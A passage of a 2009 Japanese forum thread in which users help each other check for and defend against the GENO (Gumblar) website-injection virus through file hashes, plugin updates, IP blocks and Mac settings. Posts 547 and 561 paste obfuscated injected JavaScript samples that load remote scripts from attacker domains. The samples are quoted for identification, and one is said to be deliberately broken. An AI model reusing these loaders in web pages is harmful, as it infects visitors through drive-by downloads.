geno:2009/05/17(日) 01:22:28 ID:mTkl1Ypu0
479 :
geno:2009/05/17(日) 01:22:29 ID:91/zX/Wd0
>>439 そういや自分が使っているメル鯖(さくら)も昨夜突然送受信不能になったけど
ポート番号変えたら治ったよ。ウイルスとは無関係と思って気にも留めて無かったけど…
ポート番号変更についてはさくらのQ&Aに載ってたので
439も一度メール設定確認してみたらどうだろう
480 :
GENO:2009/05/17(日) 01:22:35 ID:5igu3G/B0
>>468 自分で入れてない記述があったらウイルスだろ。
481 :
g:2009/05/17(日) 01:22:47 ID:jpopUHeK0
482 :
新参:2009/05/17(日) 01:23:27 ID:afmNfvO0P
どっちにしろkernel32.dllはあまり当てにならない気がする
タイムスタンプはいくらでも改ざん可能だし
Windows Updateで更新されることも多いから、MD5ハッシュ値もバラバラだし
483 :
GENO:2009/05/17(日) 01:23:58 ID:DdErhtbB0
kernel32.dllが3/21ktkr\(^o^)/
取り合えずcgi制御の携帯サイトだしネットショッピングしてないからセフセフ
明日は大々的にクリーンインスコせにゃ…
しかしkernel32.dllもWikiの検査項目に追加しといた方がいいんじゃね?
もう結構な数報告見かけてる気がする
そして誰かkernel32.dllの正しいファイルサイズとハッシュ値をお願いします
そっちも確認してみたい
484 :
GENO:2009/05/17(日) 01:24:17 ID:Dg7b04fU0
485 :
GENO:2009/05/17(日) 01:24:33 ID:rth+MTcW0
486 :
GENO:2009/05/17(日) 01:24:43 ID:SJfmtU710
>>482 タイムスタンプとMD5とセットでやっと意味を成す
487 :
GENO:2009/05/17(日) 01:24:46 ID:Bie8Ee4B0
改竄されたsqlsodbc.chmがkernel32.dllのタイムスタンプにあわせるんだったりして
488 :
GENO:2009/05/17(日) 01:25:44 ID:OukNUfSz0
自分もkernel32.dllが2009/03/21 23:07だったよ
一応MD5とかチェックしたけど正しい数値が分からん
CRC32
44cff192
MD5
96c3b8ea807334f4756106901c6f9495
SHA-1
60edcc193e8d9973d70778c4d03e41c98dbf8b15
489 :
g:2009/05/17(日) 01:25:44 ID:jpopUHeK0
一応、kernel32.dllが2009年3月21日23時
ってかかれてても問題ないって事でOKですか?
490 :
GENO:2009/05/17(日) 01:26:01 ID:lOQh6FbQ0
kernel32.dllがおかしいって言う人は他の症状はどうなのかも併記してほしいな
491 :
GENO:2009/05/17(日) 01:26:03 ID:2LNaQ+620
492 :
GENO:2009/05/17(日) 01:26:28 ID:B5k2mtIVP
493 :
GENO:2009/05/17(日) 01:26:34 ID:9LeFd5x0O
自分もkernel32.dllは3月21日だけどこれって本当にやばいの?
感染しててもしてなくてもみんなそうなんじゃないの?
ちなみにsqlsodbc.chmの方は異常なしだぞ
494 :
GENO:2009/05/17(日) 01:26:38 ID:5sZH/fyG0
Kernel32のサイズ1,235,968 バイトだった
495 :
GENO:2009/05/17(日) 01:26:45 ID:RT3ypR2u0
sqlsodbc.chmが46,133バイトしかないんだけど
アウト?
496 :
GENO:2009/05/17(日) 01:27:13 ID:OMRGA0Ne0
うちのvistaは二台とも3月21日じゃなかった。
3月21日になってる人はもしかして皆XPだったりして?
497 :
483:2009/05/17(日) 01:27:14 ID:DdErhtbB0
あれ、じゃあ私のとこもセーフなのか?
それならそれでいいんだが… ウイルスの方のあれがkernelにあわせてあんのかな
どっちにしろそれが普通ならよかった、ほっとした
498 :
GENO:2009/05/17(日) 01:27:23 ID:Gl7V2Hy60
みんな書き込む前にリロードしようぜ
499 :
GENO:2009/05/17(日) 01:27:41 ID:PVnb7lZv0
500 :
467:2009/05/17(日) 01:27:56 ID:SpyBZ6AtO
ありがとう
念のため削除するか迷ったけど、しばらく放置でいく
501 :
GENO:2009/05/17(日) 01:28:23 ID:z2QICuuR0
>>495 なぁ頼むよ、まとめwikiとか今までのログとかちょっとは自分で
確認してみてくれよ。
502 :
GENO:2009/05/17(日) 01:28:32 ID:HGRrWdCz0
全く感染の症状も無く、チェック項目は全てALLグリーン
99%感染していないと断言できる自分のPCもkernel32.dllは
2009/03/21 23:07 だったからこれは気にしなくて良いと思う
503 :
GENO:2009/05/17(日) 01:28:40 ID:GhtL9Szf0
504 :
GENO:2009/05/17(日) 01:28:41 ID:Co0JIJet0
kernel32.dllとやらって一体。
うちは2005年とか出てましたが。なにこれ。
505 :
GENO:2009/05/17(日) 01:28:45 ID:BgrofuDs0
俺も488と同じMD5、タイムスタンプだったよ
506 :
GENO:2009/05/17(日) 01:28:58 ID:WVTbay1AO
>>489 今の所パソコンの挙動がおかしくなったというのは聞かないから
とりあえず様子見でいいんでないかな?
507 :
GENO:2009/05/17(日) 01:29:04 ID:OMRGA0Ne0
508 :
geno:2009/05/17(日) 01:29:29 ID:UQnEuMJQ0
>>445 >「とりあえず感染してるか確認する手順(Mac)」もしくは
>「Macユーザー向け」
叩き台作ってみようと思うんだが
>>468みたいなのがいるとなると、
不可視ファイルの可視化から書かないとダメってことか?
509 :
GENO:2009/05/17(日) 01:29:33 ID:0CFt81+H0
うちもKernel32が3/21です。その他はまったく異常なし。
510 :
GENO:2009/05/17(日) 01:29:49 ID:PVnb7lZv0
511 :
GENO:2009/05/17(日) 01:29:49 ID:KYjyDRzp0
>>488 同じかつVirustotalでチェックして問題なし
512 :
g:2009/05/17(日) 01:29:51 ID:jpopUHeK0
513 :
げの:2009/05/17(日) 01:30:02 ID:axZkSb/W0
お前ら落ち着いてしばらくリロしてろ
話題被りすぎ
regedit開くと必ずHKEY_USERSが展開されてるんだが・・・
515 :
GENO:2009/05/17(日) 01:30:20 ID:5sZH/fyG0
とりあえず寝ようぜ
516 :
GENO:2009/05/17(日) 01:30:32 ID:9GZ3Whcs0
同じく全ての項目はクリアしてる自分のPCのKernel32.dllも2009年3月21日23:18:57
Kernel32.dllは関係ないと見ていいと思う
517 :
GENO:2009/05/17(日) 01:30:34 ID:uj1d73AxO
とりあえず今の流れで馬鹿が多いことはよく分かったな
518 :
geno:2009/05/17(日) 01:30:55 ID:/3OwKYN30
>>500 インスコできない状態なら放置しておいた方がまだましだね。
ウィルス駆除後は、できる事ならサイトで注意喚起してくらはい。
519 :
GENO:2009/05/17(日) 01:30:55 ID:d2XBlzrV0
>>448 ずっと前から試してるんだがメールソフトだと
送信だけがなぜかできないからブラウザにしてるんだよね
狐にNoscript入れてヤフメに許可出すことにしたよ
このページはおk…と許可出す隙もなく1秒でヤフメが警告ページに飛ばしやがるから
許可指定するのにちょと苦労したw
520 :
geno:2009/05/17(日) 01:31:00 ID:hqnP7TwX0
kernel32.dllがウイルスに弄られるって相当致命的なんじゃないか?
そんなことあったら一月前にはブラスター程度の騒ぎにはなってそうだがな。
521 :
あ:2009/05/17(日) 01:31:02 ID:FDJxu7KyP
お前等落ち着け
不安ならハッシュチェックソフト入れろ
ハッシュチェックでググッてな
522 :
GENO:2009/05/17(日) 01:31:17 ID:4MOMvxOF0
女は馬鹿でFAだな
過去スレも読めと
kernel32.dllは違うぞ
524 :
GENO:2009/05/17(日) 01:31:29 ID:OukNUfSz0
>>505 >>511 トン 自分もその他のチェックでは問題なかったからタイムスタンプが気になってたけど
問題ないって事でいいのかな
525 :
GENO:2009/05/17(日) 01:31:40 ID:HGRrWdCz0
>>488 自分も一緒だった
MD5 : 96c3b8ea807334f4756106901c6f9495
SHA-1 : 60edcc193e8d9973d70778c4d03e41c98dbf8b15
526 :
GENO:2009/05/17(日) 01:31:51 ID:JzP1VTbK0
HDDゴリゴリ言ってるなノートン更新の時間かw
527 :
GENO:2009/05/17(日) 01:32:04 ID:xeHWSKXvO
VISTA使い
・AdobeのReaderとFlashを最新版に
・Windowsアップデート
・IE8インストール
・ファイヤーウォールで禁止IP設定
・JAVAScript切り(Adobeのも
これだけやっておけばOK?
セキュリティソフトはマカフィーとかいうのが入ってて、それを最新版に更新したけど
これってどうなの
528 :
geno:2009/05/17(日) 01:32:08 ID:ZlOuERst0
感染を確認した(cmdが実行できなかった、ファイルの書き換えを確認した)
システム復元で1ヶ月前に戻した
そしたらcmdとか普通に動いたがそれで良い??
529 :
GENO:2009/05/17(日) 01:32:08 ID:gcrAZKPK0
自分も2009年3月21日、23:18:57
チェックは全部白
530 :
GENO:2009/05/17(日) 01:32:13 ID:e58aCAQS0
>>427と更新時刻まで一緒なんだけどまさかこれって…
531 :
GENO:2009/05/17(日) 01:32:43 ID:GZpNTGDm0
>>514 regeditは前閉じた時の階層と同じ場所開のがデフォ
532 :
GENO:2009/05/17(日) 01:33:16 ID:YwfjCeYW0
kerner32は今のところ関係ないと思う
533 :
GENO:2009/05/17(日) 01:33:19 ID:RavOyUZr0
kernelの話いつまでしてるんだ君らはw
534 :
GENO:2009/05/17(日) 01:33:53 ID:/BtRfzOz0
JavaScriptと言われて意味がわからない人、過剰に不安がらないように。
人のサイトのソースを見て、ただのポップアップウィンドウとか
普通に使うタグをウイルスと勘違いして米を送ってくる人がいるらしいが
>>468 数行から十数行程度の、単語などが判読できるようなものなら
サーバで挿入された広告やアク解だよ
ウイルスのコードはもっととんでもない量がある、素人には全く意味不明の記号の羅列。
>>484 >>327にあるMac用の対策は、これだけやってあればまず大丈夫だろというもので
感染者が出たからではないよ
535 :
GENO:2009/05/17(日) 01:34:03 ID:eiE9QTaXO
お前らのせいでケンタッキー食いたくなってきたぞ
どうしてくれる
536 :
GENO:2009/05/17(日) 01:34:22 ID:QyWL1QXS0
感染なかったら寝ろよお前ら
537 :
514:2009/05/17(日) 01:34:43 ID:qPi+TdMh0
>>531 ありがとう。変に怖がってしまってみっともない。
今日はFlashPlayerの更新でもして寝よう
こいつら過去レスも読めんのか・・・
539 :
げの:2009/05/17(日) 01:35:04 ID:8J2Z1lNR0
kerner32がそんなに怖いなら削除すればいいだろ
541 :
GENO:2009/05/17(日) 01:35:09 ID:O/DTZ3Lf0
>535
カーネルか
542 :
GENO:2009/05/17(日) 01:35:20 ID:gM2dMkrRO
サイトに
>>3のまとめへのリンク貼るのは問題ない?
543 :
3:2009/05/17(日) 01:35:30 ID:nbm7ZJwf0
>>426 できるだけ入れるようにするよ
>>508 たのむ
できればあるとスレでいちいち説明しなくてよくなるとは思う
(508まで確認)
544 :
GENO:2009/05/17(日) 01:35:36 ID:9LeFd5x0O
>>530 自分も
>>427と全く同じだけどkernel32.dllは別にウイルスとは関係ないみたいだし
気にしなくていいんじゃないの?
545 :
GENO:2009/05/17(日) 01:35:44 ID:VX7Lo5H7P
VistaとデュアルブートさせてるUbuntuで踏むとまずいのかね
546 :
GENO:2009/05/17(日) 01:35:52 ID:U33DfpPQ0
>>541 それだとサンダース人形の呪いになっちまう
547 :
GENO:2009/05/17(日) 01:35:56 ID:KGeijqa+0
感染してた場合のソース状況
937 :GENO:2009/05/16(土) 18:44:59 ID:O4mBjhCo0
挿入スクリプト参考に追加
※ランダムに文字を削除したから貼り付けても動かないよ
<すくりぷと language=じゃばすくりぷと><!--
(function(){var UkRR='%';var WdBp=('&61&20a&3d&22S&69ptEngi&65&22&2c&3d&22&56&
65&72s&69on+()&22&2c&6a&3d&22&22&2c&3dn&61&76ig&61tor2user&41&67ent&3bi&66
(u&2ein&6&65x&4f&66(&22C&68rm&65&22)&3c0)&26&26(&75&2ein&64ex&4ff(&22i&6e&22)
&3e0)&26&26&28u&2e&69&6d&65x&4ff&28&22&4e&54&206&22)&3c0)&26&26(&64cument
&2ecooki&65&2e&6ede&78O&66(&22&6di&6b&3d&31&22)&3c0)&26&26(t&79peo&66&28&
7arvzts)&21&3dty&70&65of&28&22A&2&7brvzt&73&3d&22A&22&3bval(&22i&66
(win&64o&77&2e&22+a+&22)))&3dj+&22+&6+&22M&61j&6fr&22+b&2b&2b&22Mi&6e&6fr
&22+a+b+&22&42uild&22+b+&22j&3&22&29&3b&646f&63ument&2ewr&69te&28&22&3cs
&63ri&70t&0&73&72c&3d&2f&2fma&72t&75&22+&22z&2e&63n&f&76i&64&2f&3fid&3d&22
&2bj+22&3c&5c&2fscrip&74&3e&22)&3b&7d').rplace(/&/g,URR);eval(uescape(WdBp))})();
--></すくりぷと>
548 :
GENO:2009/05/17(日) 01:36:09 ID:UXm7JPUp0
誰か教えてくれると嬉しいんだが、マカフィーってどうなの?
今入れてるんだが特に反応はしていない
で、まとめに書いてある通り調べたら感染はしてないみたい
549 :
GENO:2009/05/17(日) 01:36:49 ID:9zPuFtPL0
>>534 普通のスクリプト(画像オーバーロール等)でもそこそこ長くなるから
長さを判断材料に入れるのはイクナイ
550 :
GENO:2009/05/17(日) 01:37:20 ID:uQV6yiNu0
マカフィーなんて今すぐ窓から投げ捨てろ
551 :
GENO:2009/05/17(日) 01:37:22 ID:eKRh6hw+0
>477がちょっと気になったってだけでkernel32.dllを出したんだろ?
ソースも何も無いのに何踊ってんだ…とりあえず回線切って寝ようぜ
552 :
GENO:2009/05/17(日) 01:37:29 ID:Wj+WkF/l0
553 :
GENO:2009/05/17(日) 01:37:31 ID:w3mW0Bmf0
それじゃあうちのkernel32.dll 2009年3月21日、23:07:24
MD5
96C3B8EA807334F4756106901C6F9495
554 :
geno:2009/05/17(日) 01:37:45 ID:hqnP7TwX0
>>539 それWindows捨てろといってるようなもんじゃないかw
555 :
GENO:2009/05/17(日) 01:37:48 ID:Qk4iTuLX0
サイトのソースに長文のjavascriptを書いてる人は、
今の時期だけでも外部ファイル化しとくと誤解防げていいかもね
556 :
508:2009/05/17(日) 01:37:57 ID:UQnEuMJQ0
>>543 おk了解
時間かかるかもしれんがやってみる
>他マカ
昨夜からほぼ貫徹状態だから、上げたらボコスコ叩いて直してくれ
557 :
GENO:2009/05/17(日) 01:38:28 ID:a1JU4KeY0
一つの話題に「あたしにも一言言わせて」と同じようなレスをつける現象と似てるな
558 :
GENO:2009/05/17(日) 01:38:30 ID:27OC+pNi0
>>527 ユーザーアカウント制御有効(デフォルトのまま)
559 :
しねGENO:2009/05/17(日) 01:38:33 ID:gigZ4JYYO
FlashPlayerとかReaderとかを火狐で入れようとした場合
アドオン扱いされるようにやらなきゃいけないのかな?
特にReaderは何か普通にデスクトップにアイコン作られてしまった
560 :
GENO:2009/05/17(日) 01:38:42 ID:uj1d73AxO
>>542 そんなことも分からないならもうサイト管理なんてするな
561 :
GENO:2009/05/17(日) 01:38:47 ID:/BtRfzOz0
スレ2の920 名前:GENO メェル:sage 投稿日:2009/05/16(土) 18:39:12 ID:5AlQPwu90
セキュリティ板のGENOスレ4にあったJavaScriptの一例貼るよ
スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト
562 :
468:2009/05/17(日) 01:38:58 ID:rn3zMKpE0
>>471 >>480 レスどうもありがとうございます。
>>484 丁寧な回答をどうもありがとうございました。
ソースを参照先と比べてみましたが、だいぶ違いました。
念のため→
http://wepawet.cs.ucsb.edu/ でチェックしてもらってます。
大昔にタグも何も分からずビルダー先生で作ったものを、そのまま使い続けてしまっていました。
この際、きちんと見直して改装しようと思いました。
ブラウザも狐にしてJAVA無効にしました。
本当にありがとうございました。macでも気を付けます!
563 :
GENO:2009/05/17(日) 01:39:31 ID:Dg7b04fU0
>>528 本当に大丈夫かウィルスチェックした上で、
システムの復元用のデータの削除とか、
ディスククリーンアップを推奨。
感染したデータが残ってたらあんまり意味ないからね。
564 :
GENO:2009/05/17(日) 01:39:29 ID:0jOyX3Xk0
自分のカーネルさん
2009年3月21日23:18
サイズ:1,232,384 バイト
MD5:fa587e72f49249a882bace12712eab41
SHA-1:1a3531af7668d0c42a388c3a91a3ab1bec75c42d
なんだけど・・・あれ、まさかアウトか?
565 :
GENO:2009/05/17(日) 01:39:58 ID:5i7B8IHS0
Macユーザーの対処法
○10.3までのOSユーザー
Flash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
○TigerとLeopard
Acrobatは9.1、Flash Playerは10.0.22.87以上に更新する
Acrobat Readerの初期設定からAcrobat JavaScriptをオフにする(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
○Webブラウザ内閲覧機能を切るかJavaScriptオフにする
○Firefoxの場合
3.0.10に更新してNoScript入れること(ツール→アドオン→アドオンを追加→「NoScript」を入れる)
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置き、リンク先が不正URLでないか確認した上で「一時的に許可」
○Safari・OmniWebなどWebKitベースブラウザの場合
「ダウンロードしたファイルを開く」をオフにする(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを有効にする」および「プラグインを有効にする」も切っておく。
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できる(OmniWebだけのシャットダウン、Safariには影響しません)
○自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
○BootCampでXPを入れている人
C:¥WINDOWS¥system32¥sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
○動画はようつべならMacTubes、ニコならMacNicoTunesで見る。
566 :
GENO:2009/05/17(日) 01:40:45 ID:KYjyDRzp0
>>3 ウィルスバスター2009でのIPブロック
>>389でおk
あとフィッシング詐欺対策を有効にしておくのもお勧め
1.メイン画面→「有害サイト/迷惑メール対策」クリック
2.フィッシング詐欺対策が無効になっていた場合は有効にしておく
567 :
GENO:2009/05/17(日) 01:40:53 ID:JzP1VTbK0
>549のオーバーロールで走り高跳びが頭に浮かんだ
カーネルの話はもう良いから・・・話がややこしくなる。
sqlsodbc.chmのMD5調べたほうがよっぽど健全だよ。
569 :
GENO:2009/05/17(日) 01:41:35 ID:OukNUfSz0
570 :
GENO:2009/05/17(日) 01:41:40 ID:z2QICuuR0
>>548 ウィルススキャンしてまとめにあるとおり調べてそれでも
少しでも心配点があって夜も眠れず肌が荒れてしまうなら
うだうだしてないでOS再インストールするとかPC窓から
放り投げてみたり象に踏ませても耐えられるか実験するほうが
ここでそんなこと聞くよりよっぽど有効だよ。
571 :
GENO:2009/05/17(日) 01:42:02 ID:eiE9QTaXO
572 :
GENO:2009/05/17(日) 01:42:38 ID:SJfmtU710
573 :
GENO:2009/05/17(日) 01:42:40 ID:jg6WWDTm0
MACもLinuxもJSは実行するが、その先のオブジェクトが実行される訳じゃない
574 :
GENO:2009/05/17(日) 01:42:47 ID:9zPuFtPL0
kernelの意味分かって言ってるの?
どんだけ釣られてるの。
576 :
GENO:2009/05/17(日) 01:43:17 ID:EfuA3f1a0
【これって】カーネルたんアウトorセーフ判定スレ【まさか?】
とか作ってそこでやればいいのに
577 :
GENO:2009/05/17(日) 01:43:30 ID:BFtvD8q80
まとめサイトにマカー用ウィルススキャンソフト入れてもらえないだろうか?
フリーのでClamXavというのがあるんだが、手動で随時ウィルス定義を更新&
定義更新が早くてGENO対応しているらしいとのことなので、マカーにこっちを
使ってもらえたらオンラインスキャンの負担が軽くなるんじゃないかと思って。
>>389 このIPブロックの情報元ってどこですか?
579 :
GENO:2009/05/17(日) 01:44:28 ID:Iji5kOgt0
XP、sp3、avast!4.8、WindowsFW、スレイプニルを使用しています。
アドビのリーダーは入れておらず、
フラッシュプレイヤー・avast!データ更新・窓アップデート等は最新です。
現在の所感染していません。
サイトは持っていますが、ワクチンが出来るまで更新を控えようとFTPは削除しました。
まとめサイトの対策を読んだのですが、
WindowsFWで特定のIPを遮断、というのは不可能なのでしょうか?
探してみたのですが、それらしき機能が見つかりませんでした。
何か特定の物を制限するとなると、
インターネットオプション→セキュリティ→制限つきサイト
のレベルを最高(全てのチェックを無効)にするくらいかな、と思うのですが
ここの制限サイトの所に
94.247.2.0/23 (94.247.2.0 - 94.247.3.255)
95.129.145.58
95.129.144.0/23 (95.129.144.0-95.129.145.255)
78.109.29.112
94.229.65.160/27
この5つをこのままコピペして追加、という事でいいのでしょうか?
それとも、FWではないのだからこの操作は意味がありませんか?
都合上幾つかのサイト(固定)を日々閲覧しなくてはならず、
火狐の事がまったくわからないので慣れたスレイプニルの
ActiveXのDLやjs等を全て切断した制限モードで閲覧しようと思うのですが
現在は上記の状態です。何か他に対策はあるでしょうか。
頓珍漢な質問だったらすみません。
580 :
ゲノ:2009/05/17(日) 01:44:29 ID:0hJ7K3FAO
581 :
geno:2009/05/17(日) 01:44:57 ID:ZlOuERst0
sqlsodbc.chmが1323バイトなのだが
感染確定なの??
kernelはどうなの??
582 :
GENO:2009/05/17(日) 01:45:13 ID:HhGbn2rD0
>>565 Safariの開発メニューを表示させる方法も書いておいた方がいいかも。
環境設定→詳細→メニューバーに"開発"メニューを表示 にチェックを入れる
583 :
GD:2009/05/17(日) 01:45:27 ID:ueGxpPuI0
kerioのFWは接続しようとする許可したプログラムが変更された場合
警告が出る。つまりハッシュを監視している。
584 :
GENO:2009/05/17(日) 01:45:32 ID:b4Gu+4XE0
サイトのjavascript使うものは全部消してきた
ソースみて安全なjavascriptでも怖がる人いそうだから
585 :
GENO:2009/05/17(日) 01:45:36 ID:/qIfNmc30
>>488 ハッシュ値もチェックしてみたけど全て同じ・・・・・・・
他に異常は全く見受けられないんだがこれはどうなんだろうか・・・・
クレカで買い物しまくってるしオンライン銀行何個も持ってるのに勘弁してくれよもうorz
586 :
GENO:2009/05/17(日) 01:45:40 ID:XKBQigeq0
>>571 さっきからお前のレスを見てると腹がへってくる
587 :
GENO:2009/05/17(日) 01:45:57 ID:2v0JSZ+40
カーネルは今んとこ関係ないっつってんだろ
588 :
GENO:2009/05/17(日) 01:46:12 ID:QyWL1QXS0
589 :
GD:2009/05/17(日) 01:46:24 ID:ueGxpPuI0
590 :
GENO:2009/05/17(日) 01:46:54 ID:OukNUfSz0
591 :
GENO:2009/05/17(日) 01:47:11 ID:/qIfNmc30
592 :
GENO:2009/05/17(日) 01:47:33 ID:0jOyX3Xk0
>>572 ありがとう、検索かけても出なかった。
ということはおkということでいいのかな?
他の人と大分文字が違ってたから焦った…
593 :
GENO:2009/05/17(日) 01:47:41 ID:PZIP1ghR0
594 :
GENO:2009/05/17(日) 01:48:13 ID:Co0JIJet0
ハッシュ値 というのを読んでハッシュドポテト食いたくてたまらなくなった。
近所にマックないんだ…orz
595 :
GENO:2009/05/17(日) 01:48:19 ID:LRthjJVQ0
しばらくは専ブラで板巡回くらいしか出来ないな
後、自分がホスト立ててそこに何人かクライアント呼び込んで遊ぶタイプのゲームやってるんだが
クライアントが感染してたらこっちに飛び火してくるなんて事はないよな?
596 :
GENO:2009/05/17(日) 01:48:43 ID:kjiI6kP+0
書き込む前に何故リロードしない奴が多いんだ
597 :
439:2009/05/17(日) 01:49:03 ID:4Z+FrIEGO
>>444 >>479 ご親切にありがとうございます!
ご指摘の通りFWが原因でした……おかげさまで大変助かりました
スレ汚し失礼致しました
598 :
GENO:2009/05/17(日) 01:49:04 ID:xUlTvuaB0
>>477 チェストのヘルプを良く読んでみ。俺も最初はなんじゃコレと
思ったけどね。カーネルは無実だろ。
>>579 制限すべきサイト(IPアドレス)がその通りなら、
WindowsFWでそれを制限すれば良いのでは?
そもそもそのリストはどこからの情報?
600 :
3:2009/05/17(日) 01:49:36 ID:nbm7ZJwf0
>>566追加します
>>577入れますんでURLくださいな
あと現在情報が埋もれまくりなので、Wiki関連は>3入れてください
マカーは全然わからないので
>>445的な感じを考えてますが
新規ページ作って>>○○追加、みたいな感じでまとまり次第>3につけといてください
(595まで確認)
601 :
geno:2009/05/17(日) 01:49:43 ID:hqnP7TwX0
602 :
GENO:2009/05/17(日) 01:49:53 ID:juU+TMyj0
>>596 リロードっつうより検索しない奴だろ…
まとめWiki読めよマジで
603 :
GENO:2009/05/17(日) 01:50:01 ID:wsFKGO1y0
>565追記
○Leopard(10.5.x)ユーザーは早急に10.5.7へアップグレードすること
導入の際Safariは3.2.3へ強制アップデートされます
(Apple Software UpdateのほかApple公式→Mac OS X 10.5.7 統合アップデート(729 MB)をDL)
○Tiger(10.4.11)はSecurity Update 2009-002 for Tiger の導入を忘れずに
○Panther(10.3.9)以下のユーザーはなるべく早く最新OS環境へ移行するか、
>565の通りFlash Player・Acrobat Readerをアンインストールしましょう
○ClamXav 1.1.1 e951を導入すること(OS10.2〜10.5まで対応、無料)
JSRedir-R対応済み最新バージョンです(5/17 午前1時更新)。
BootCampでXP・Vista導入している人で、カスペのオンラインスキャンを実行したひとでも
一度MacOS環境上からBootCamp領域を完全スキャンして下さい。
604 :
GENO:2009/05/17(日) 01:50:05 ID:JzP1VTbK0
>594
もうwお前のせいでカップ麺開封したじゃないか
605 :
GENO:2009/05/17(日) 01:50:15 ID:SJfmtU710
>>582 むしろ、Safariは使用回避の方が良くない?
>>585 このトロイに限っていえば、通信を監視して、FTPを盗聴するタイプの可能性が高いから、
そういう意味では過剰な不安は要らないと思うよ。
>>592 ファイルバージョンはいくらだった?
606 :
geno:2009/05/17(日) 01:50:52 ID:KFLP4Q6J0
>>577 へえ、ClamXav対応してるんだ? どこ情報?
Mac板も見てるんだが追いつかん
監視はキャッシュ+ダウンロード+アプリケーション、
ぐらいでいいのかなあ…
607 :
geno:2009/05/17(日) 01:51:06 ID:eTdHndxb0
>>428 コントロールパネル>プログラムの追加と削除>Adobe Flash Player (バージョン名)選択
>サポート情報を参照するには、ここをクリックしてください。
からでもアドビフラッシュプレイヤーのバージョンは確認できる。(最新ver10.0.22.87)
ディレクトリ構造が分からん人はこっちでもいいかもな。間違って削除ボタンを押しても
知らんが。dll消すよりはマシだし、最新版を再インストールすりゃ済む話しだしね。
608 :
GENO:2009/05/17(日) 01:52:01 ID:27OC+pNi0
>>595 絶対ないとは言い切れないが多分ない
今のところ改竄されたウェブページを開くことでしか感染しないので
609 :
geno:2009/05/17(日) 01:52:46 ID:/3OwKYN30
>>604 こんな時間に食べるだなんて…
つ、つられたりしないんだからね!
焼き鳥食べたい
610 :
GENO:2009/05/17(日) 01:53:13 ID:YwfjCeYW0
さっきから腹が減るスレだな
611 :
GENO:2009/05/17(日) 01:53:16 ID:mWnQrBzU0
このスレ見て焦ってavast入れて全スキャンかけたんだが
マカフィー入ってるのを忘れてた
一応スキャン終わったんだけどavastアンインストールした方が良い・・・?
というかavastの全スキャンが20分もかからずに終わったけどこんなもんなの?
612 :
GENO:2009/05/17(日) 01:53:23 ID:wsFKGO1y0
613 :
GENO:2009/05/17(日) 01:53:54 ID:ksW+wlYL0
今の流れだと誤解を生みそう。
まずmacは基本的に感染のしようがないので大丈夫。
ただし変異してウィルスの対象になるかもしれない可能性がわずかながらあるので
下記の対策を予防としてやっておきましょう。
という根本を書いておかないと混乱を招くだけだよ。
614 :
GENO:2009/05/17(日) 01:54:30 ID:J2f6QJAe0
つまらん食い物ネタで遊びたい奴は他行けよ
615 :
GENO:2009/05/17(日) 01:54:40 ID:eiE9QTaXO
もう皆で何か食いながらマターリ対策練るスレでいいじゃない
このままのスピードだったら一晩で6か7ぐらい行きそうだし鯖に負担かけるのイクナイ
616 :
geno:2009/05/17(日) 01:54:53 ID:oh3SbsZKO
safariもやばいの?
617 :
GENO:2009/05/17(日) 01:54:59 ID:HhGbn2rD0
>>605 そうは言っても使わざるを得ない人もいるのだよ(ソース自分)
それにSafariの開発メニューは通常だと表示されてないから気づかない人いると思って。
618 :
GENO:2009/05/17(日) 01:55:02 ID:F89TTXiT0
>>611 Avastを一時的に使いたいのなら
一度、マカフィーをすべて無効にして常駐切っておけ
619 :
GENO:2009/05/17(日) 01:55:53 ID:SJfmtU710
>>617 あえて、良さが全部殺されたOpera@Macを推奨するとか、どう?w
620 :
geno:2009/05/17(日) 01:56:00 ID:UQnEuMJQ0
621 :
GENO:2009/05/17(日) 01:56:04 ID:Co0JIJet0
>>604 カップ麺があるだけ羨ましいぞwww 仕方ないから黒糖くるみとか食ってる…腹の足しにならん
kingsoftがどうなのかさっぱり判らんのだが何も言ってこないところみると大丈夫と思っていいのかな。
622 :
